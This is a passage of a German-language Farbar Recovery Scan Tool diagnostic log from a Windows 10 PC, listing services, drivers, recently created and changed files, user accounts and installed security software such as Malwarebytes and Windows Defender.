R2 RtkAudioUniversalService; C:\WINDOWS\System32\DriverStore\FileRepository\hdxsstm.inf_amd64_1a1e8196b6801ccf\RtkAudUService64.exe [835904 2020-04-17] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-15] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [Datei ist nicht signiert]
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
===================== Treiber (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 BrSerIb; C:\WINDOWS\system32\DRIVERS\BrSerIb.sys [95344 2014-01-23] (Brother Industries, Ltd. -> Brother Industries Ltd.)
S3 BrUsbSIb; C:\WINDOWS\system32\DRIVERS\BrUsbSIb.sys [21872 2014-01-23] (Brother Industries, Ltd. -> Brother Industries Ltd.)
S3 BTWDPAN; C:\WINDOWS\System32\drivers\btwdpan.sys [84008 2019-09-09] (Broadcom Corporation -> Broadcom Corporation.)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [153312 2021-02-05] (Malwarebytes Corporation -> Malwarebytes)
R1 klhk; C:\WINDOWS\System32\drivers\klhk.sys [1191616 2018-05-09] (Kaspersky Lab -> AO Kaspersky Lab)
R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [220600 2021-02-05] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [19912 2021-02-05] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\System32\DRIVERS\farflt.sys [198248 2021-02-05] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\DRIVERS\mbam.sys [77496 2021-02-05] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248992 2021-02-05] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\DRIVERS\mwac.sys [142440 2021-02-05] (Malwarebytes Inc -> Malwarebytes)
S3 pelmouse; C:\WINDOWS\System32\drivers\pelmouse.sys [26880 2016-07-11] (WDKTestCert idd,131110062695071623 -> TPMX Electronics Ltd.)
S3 pelusblf; C:\WINDOWS\System32\drivers\pelusblf.sys [33048 2016-07-11] (WDKTestCert idd,131110062695071623 -> )
S3 pelvendr; C:\WINDOWS\System32\drivers\pelvendr.sys [15032 2016-07-11] (WDKTestCert idd,131110062695071623 -> TPMX Electronics Ltd.)
S3 phidmice; C:\WINDOWS\System32\drivers\phidmice.sys [33048 2016-07-11] (WDKTestCert idd,131110062695071623 -> )
S3 pmouself; C:\WINDOWS\System32\drivers\pmouself.sys [26880 2016-07-11] (WDKTestCert idd,131110062695071623 -> TPMX Electronics Ltd.)
S3 pvendrlf; C:\WINDOWS\System32\drivers\pvendrlf.sys [15032 2016-07-11] (WDKTestCert idd,131110062695071623 -> TPMX Electronics Ltd.)
S3 PVUSB; C:\WINDOWS\System32\drivers\CESG64.sys [63808 2007-02-19] (CASIO COMPUTER CO.,LTD. -> CASIO COMPUTER CO.,LTD.)
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 SurfaceAccessoryDevice; C:\WINDOWS\System32\drivers\SurfaceAccessoryDevice.sys [56096 2017-08-31] (OEMTest OS Driver Leaf -> Microsoft Corporation)
S3 WacHIDRouterISD; C:\WINDOWS\System32\drivers\WacHIDRouterISD.sys [86912 2019-09-09] (Wacom Technology Corporation -> Wacom Technology, Corp.)
S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2021-02-05 11:40 - 2021-02-05 11:40 - 000001919 _____ C:\Users\richa\Desktop\AdwCleaner[C00].txt
2021-02-05 11:39 - 2021-02-05 11:40 - 000000000 ____D C:\AdwCleaner
2021-02-05 11:38 - 2021-02-05 11:38 - 008457584 _____ (Malwarebytes) C:\Users\richa\Downloads\adwcleaner_8.0.9.1.exe
2021-02-05 11:38 - 2021-02-05 11:38 - 000002170 _____ C:\Users\richa\Desktop\MBAM.txt
2021-02-05 11:37 - 2021-02-05 11:37 - 000198248 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2021-02-05 11:37 - 2021-02-05 11:37 - 000142440 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2021-02-05 11:37 - 2021-02-05 11:37 - 000077496 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2021-02-05 11:31 - 2021-02-05 11:37 - 000000000 ____D C:\Users\richa\AppData\LocalLow\IGDump
2021-02-05 11:31 - 2021-02-05 11:31 - 000248992 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2021-02-05 11:31 - 2021-02-05 11:31 - 000220600 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys
2021-02-05 11:31 - 2021-02-05 11:31 - 000002043 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2021-02-05 11:31 - 2021-02-05 11:31 - 000002031 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2021-02-05 11:31 - 2021-02-05 11:31 - 000002031 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2021-02-05 11:31 - 2021-02-05 11:31 - 000000000 ____D C:\Users\richa\AppData\Local\mbam
2021-02-05 11:31 - 2021-02-05 11:30 - 000153312 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2021-02-05 11:31 - 2021-02-05 11:30 - 000019912 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2021-02-05 11:30 - 2021-02-05 11:30 - 002086424 _____ (Malwarebytes) C:\Users\richa\Downloads\MBSetup.exe
2021-02-05 11:30 - 2021-02-05 11:30 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-02-05 11:30 - 2021-02-05 11:30 - 000000000 ____D C:\Program Files\Malwarebytes
2021-02-05 11:27 - 2021-02-05 11:28 - 000009981 _____ C:\Users\richa\Desktop\Fixlog.txt
2021-02-05 09:56 - 2021-02-05 09:56 - 000148974 _____ C:\Users\richa\Downloads\Richard Meier.pdf
2021-02-05 09:55 - 2021-02-05 09:55 - 003176125 _____ C:\Users\richa\Downloads\Versicherungsbedingungen.pdf
2021-02-05 09:54 - 2021-02-05 09:55 - 000540814 _____ C:\Users\richa\Downloads\Informationsblatt zu Versicherungsprodukten.pdf
2021-02-05 09:54 - 2021-02-05 09:54 - 000792373 _____ C:\Users\richa\Downloads\Antrag.pdf
2021-02-05 09:54 - 2021-02-05 09:54 - 000055724 _____ C:\Users\richa\Downloads\Inhaltsverzeichnis.pdf
2021-02-05 09:40 - 2021-02-05 09:41 - 000046146 _____ C:\Users\richa\Desktop\Addition.txt
2021-02-05 09:38 - 2021-02-05 11:42 - 000016869 _____ C:\Users\richa\Desktop\FRST.txt
2021-02-05 09:37 - 2021-02-05 11:41 - 000000000 ____D C:\FRST
2021-02-05 09:36 - 2021-02-05 09:37 - 002297856 _____ (Farbar) C:\Users\richa\Desktop\FRST64.exe
2021-02-04 10:36 - 2021-02-04 10:36 - 000107381 _____ C:\Users\richa\Downloads\WhatsApp Image 2021-02-04 at 10.36.46.jpeg
2021-02-04 06:45 - 2021-02-04 06:45 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2021-02-03 12:59 - 2021-02-03 13:00 - 000261500 _____ C:\Users\richa\Downloads\WhatsApp Image 2021-02-03 at 12.59.09.jpeg
2021-02-03 12:53 - 2021-02-03 12:54 - 000149193 _____ C:\Users\richa\Downloads\WhatsApp Image 2021-02-03 at 12.52.37.jpeg
2021-02-03 12:50 - 2021-02-03 12:50 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2021-02-03 12:50 - 2021-02-03 12:50 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2021-02-03 12:50 - 2021-02-03 12:50 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2021-02-03 12:50 - 2021-02-03 12:50 - 000044064 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2021-01-30 17:37 - 2021-01-30 17:37 - 000720193 _____ C:\Users\richa\Desktop\DHL Sendungsverfolgung _ DHL.pdf
2021-01-29 19:13 - 2021-01-29 19:13 - 000001457 _____ C:\Users\richa\Desktop\Origin.exe - Verknüpfung.lnk
2021-01-28 18:07 - 2021-01-28 18:07 - 000087736 _____ C:\Users\richa\Desktop\Me (1).pdf
2021-01-22 17:23 - 2021-01-22 17:23 - 000094670 _____ C:\Users\richa\Desktop\Abstellgenehmigung.pdf
2021-01-18 17:44 - 2021-01-18 17:44 - 000208499 _____ C:\Users\richa\Desktop\Entwurf Klausurplan 12.2 Stand 18.01.21.pdf
2021-01-18 17:31 - 2021-01-18 17:31 - 000050314 _____ C:\Users\richa\Desktop\10d_Bemerkungen_Zeugnis.pdf
2021-01-15 00:10 - 2021-01-15 00:10 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-15 00:10 - 2021-01-15 00:10 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-15 00:10 - 2021-01-15 00:10 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-15 00:10 - 2021-01-15 00:10 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-15 00:10 - 2021-01-15 00:10 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-15 00:10 - 2021-01-15 00:10 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-15 00:10 - 2021-01-15 00:10 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-15 00:09 - 2021-01-15 00:09 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-15 00:09 - 2021-01-15 00:09 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-15 00:09 - 2021-01-15 00:09 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-15 00:09 - 2021-01-15 00:09 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-15 00:09 - 2021-01-15 00:09 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-15 00:09 - 2021-01-15 00:09 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-15 00:09 - 2021-01-15 00:09 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-15 00:09 - 2021-01-15 00:09 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-15 00:09 - 2021-01-15 00:09 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-15 00:09 - 2021-01-15 00:09 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-15 00:09 - 2021-01-15 00:09 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-15 00:09 - 2021-01-15 00:09 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-15 00:09 - 2021-01-15 00:09 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-15 00:09 - 2021-01-15 00:09 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-15 00:09 - 2021-01-15 00:09 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-15 00:09 - 2021-01-15 00:09 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-15 00:08 - 2021-01-15 00:08 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-15 00:08 - 2021-01-15 00:08 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-15 00:08 - 2021-01-15 00:08 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-15 00:08 - 2021-01-15 00:08 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-15 00:08 - 2021-01-15 00:08 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-15 00:08 - 2021-01-15 00:08 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-15 00:08 - 2021-01-15 00:08 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-15 00:08 - 2021-01-15 00:08 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-15 00:08 - 2021-01-15 00:08 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-15 00:07 - 2021-01-15 00:07 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-15 00:07 - 2021-01-15 00:07 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-15 00:07 - 2021-01-15 00:07 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-15 00:07 - 2021-01-15 00:07 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-15 00:07 - 2021-01-15 00:07 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-15 00:07 - 2021-01-15 00:07 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-15 00:07 - 2021-01-15 00:07 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-15 00:07 - 2021-01-15 00:07 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-15 00:06 - 2021-01-15 00:06 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-15 00:06 - 2021-01-15 00:06 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-15 00:06 - 2021-01-15 00:06 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-15 00:06 - 2021-01-15 00:06 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 17:50 - 2021-01-13 17:50 - 000930922 _____ C:\Users\richa\Desktop\Rechnung_Gas_Wasser.pdf
==================== Ein Monat (geänderte) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2021-02-05 11:37 - 2020-08-22 07:12 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-02-05 11:37 - 2020-08-22 07:03 - 000008192 ___SH C:\DumpStack.log.tmp
2021-02-05 11:37 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState
2021-02-05 11:37 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-02-05 11:37 - 2018-10-02 13:40 - 000000000 ___RD C:\Users\richa\OneDrive
2021-02-05 11:36 - 2020-08-22 07:13 - 001722788 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-02-05 11:36 - 2020-06-12 22:48 - 000041448 _____ C:\WINDOWS\system32\OV7251_FRONT.aiqd
2021-02-05 11:36 - 2019-12-07 15:51 - 000746376 _____ C:\WINDOWS\system32\perfh007.dat
2021-02-05 11:36 - 2019-12-07 15:51 - 000150746 _____ C:\WINDOWS\system32\perfc007.dat
2021-02-05 11:36 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-02-05 11:36 - 2019-12-07 10:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2021-02-05 11:36 - 2018-10-03 08:57 - 000041448 _____ C:\WINDOWS\system32\OV8865_REAR.aiqd
2021-02-05 11:36 - 2018-10-03 08:57 - 000041448 _____ C:\WINDOWS\system32\OV5693_FRONT.aiqd
2021-02-05 11:31 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-02-05 11:28 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-02-05 11:28 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-02-05 11:28 - 2018-10-06 08:39 - 000000000 ____D C:\Users\richa\AppData\LocalLow\Temp
2021-02-05 11:24 - 2020-08-22 07:03 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-02-05 10:06 - 2018-10-02 17:10 - 000000000 ___RD C:\Users\richa\Documents\Scanned Documents
2021-02-05 09:56 - 2018-10-03 15:49 - 000000347 _____ C:\WINDOWS\BRRBCOM.INI
2021-02-05 09:14 - 2020-08-22 07:59 - 000000000 ____D C:\WINDOWS\Firmware
2021-02-05 09:11 - 2020-06-04 14:56 - 000002446 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-02-05 09:11 - 2019-02-17 19:58 - 000002303 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-02-05 09:09 - 2020-03-22 17:21 - 000000000 ____D C:\Users\richa\AppData\Local\Paradox Interactive
2021-02-05 08:53 - 2020-06-04 11:13 - 000000000 ____D C:\Users\richa\AppData\Local\WebEx
2021-02-05 08:52 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-02-04 23:09 - 2019-09-18 19:07 - 000000000 ____D C:\Users\richa\AppData\Roaming\Origin
2021-02-04 23:09 - 2019-09-18 19:07 - 000000000 ____D C:\ProgramData\Origin
2021-02-04 18:25 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-02-04 16:08 - 2019-09-18 19:12 - 000000000 ____D C:\Program Files (x86)\Origin Games
2021-02-04 16:07 - 2019-09-18 19:07 - 000000000 ____D C:\Users\richa\AppData\Local\Origin
2021-02-04 16:04 - 2020-10-21 16:16 - 000000000 ____D C:\Users\richa\Desktop\Haus
2021-02-04 14:51 - 2018-10-02 17:11 - 000000000 ___RD C:\Users\richa\Desktop\Upload_ISERV
2021-02-04 13:46 - 2020-08-14 09:04 - 000000000 ____D C:\Users\richa\AppData\Roaming\Diercke Atlas
2021-02-04 13:34 - 2018-10-02 17:11 - 000000000 ___RD C:\Users\richa\Desktop\Mailanhänge
2021-02-04 12:13 - 2018-10-02 13:38 - 000000000 ____D C:\Users\richa\AppData\Local\Packages
2021-02-04 08:05 - 2018-10-02 17:40 - 000001170 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\paint.net.lnk
2021-02-04 08:05 - 2018-10-02 17:40 - 000000000 ____D C:\Program Files\paint.net
2021-02-04 07:00 - 2020-11-08 17:59 - 000000000 ____D C:\WINDOWS\Minidump
2021-02-04 07:00 - 2019-09-17 18:06 - 000000000 ____D C:\Users\richa\AppData\Local\CrashDumps
2021-02-04 06:45 - 2019-03-24 10:08 - 000000000 ____D C:\Program Files (x86)\Dropbox
2021-02-04 06:38 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2021-02-03 14:38 - 2017-06-08 20:17 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2021-02-02 18:24 - 2018-10-02 16:50 - 000000000 ____D C:\Users\richa\AppData\Local\Spotify
2021-02-02 18:16 - 2018-10-02 16:49 - 000000000 ____D C:\Users\richa\AppData\Roaming\Spotify
2021-02-02 17:57 - 2018-10-02 17:12 - 000000000 ____D C:\Users\richa\Documents\Soundaufnahmen
2021-02-02 00:02 - 2020-08-22 07:12 - 000003362 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-570092518-3918108528-2642111008-1001
2021-02-02 00:02 - 2020-08-22 07:04 - 000002389 _____ C:\Users\richa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2021-02-02 00:01 - 2020-06-04 11:13 - 000000000 ____D C:\Users\richa\AppData\LocalLow\WebEx
2021-01-31 14:43 - 2018-10-02 17:10 - 000000000 ____D C:\Users\richa\Documents\Lebensdateien
2021-01-28 22:37 - 2018-10-30 19:02 - 000000000 ____D C:\Program Files (x86)\Steam
2021-01-28 19:48 - 2019-09-18 19:11 - 000000000 ____D C:\Program Files (x86)\Origin
2021-01-25 17:08 - 2019-03-24 10:08 - 000001228 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job
2021-01-25 17:08 - 2019-03-24 10:08 - 000001224 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job
2021-01-25 16:51 - 2018-10-30 19:09 - 000000000 ____D C:\Users\richa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2021-01-24 08:39 - 2020-08-19 08:32 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2021-01-23 19:22 - 2020-08-22 07:12 - 000004288 _____ C:\WINDOWS\system32\Tasks\DropboxUpdateTaskMachineUA
2021-01-23 19:22 - 2020-08-22 07:12 - 000004056 _____ C:\WINDOWS\system32\Tasks\DropboxUpdateTaskMachineCore
2021-01-22 07:52 - 2018-10-02 15:56 - 000799104 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2021-01-19 13:59 - 2018-10-02 17:12 - 000000000 ___RD C:\Users\richa\Desktop\Zum Kopieren
2021-01-19 11:54 - 2020-11-02 09:57 - 000002241 _____ C:\Users\richa\Desktop\GeoGebra Classic.lnk
2021-01-19 11:54 - 2020-11-02 09:57 - 000000000 ____D C:\Users\richa\AppData\Local\GeoGebra_6
2021-01-18 07:52 - 2020-08-22 07:12 - 000003700 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-18 07:52 - 2020-08-22 07:12 - 000003576 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-18 07:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\NDF
2021-01-16 11:39 - 2018-10-02 17:11 - 000000000 ___RD C:\Users\richa\Desktop\Zum Einsortieren
2021-01-15 01:07 - 2020-08-22 07:03 - 004859920 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-15 01:04 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-15 01:04 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-15 01:04 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-15 01:04 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-15 00:06 - 2020-08-22 07:09 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-14 23:58 - 2020-08-21 09:06 - 000000000 ___HD C:\$WinREAgent
2021-01-14 23:55 - 2018-10-03 09:19 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-14 23:53 - 2018-10-03 09:19 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-11 20:34 - 2019-10-11 17:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========
2019-09-02 19:31 - 2020-08-04 20:10 - 000000132 _____ () C:\Users\richa\AppData\Roaming\Adobe PNG Format CS5 Prefs
2018-11-16 20:32 - 2018-11-16 20:42 - 000003072 _____ () C:\Users\richa\AppData\Roaming\LIDL Fotos Prefsv3
==================== SigCheck ============================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
==================== Ende von FRST.txt ========================
Addition Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-02-2021
durchgeführt von richa (05-02-2021 11:43:37)
Gestartet von C:\Users\richa\Desktop
Windows 10 Pro Version 20H2 19042.746 (X64) (2020-08-22 06:12:34)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-570092518-3918108528-2642111008-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-570092518-3918108528-2642111008-503 - Limited - Disabled)
Gast (S-1-5-21-570092518-3918108528-2642111008-501 - Limited - Disabled)
richa (S-1-5-21-570092518-3918108528-2642111008-1001 - Administrator - Enabled) => C:\Users\richa
WDAGUtilityAccount (S-1-5-21-570092518-3918108528-2642111008-504 - Limited - Disabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
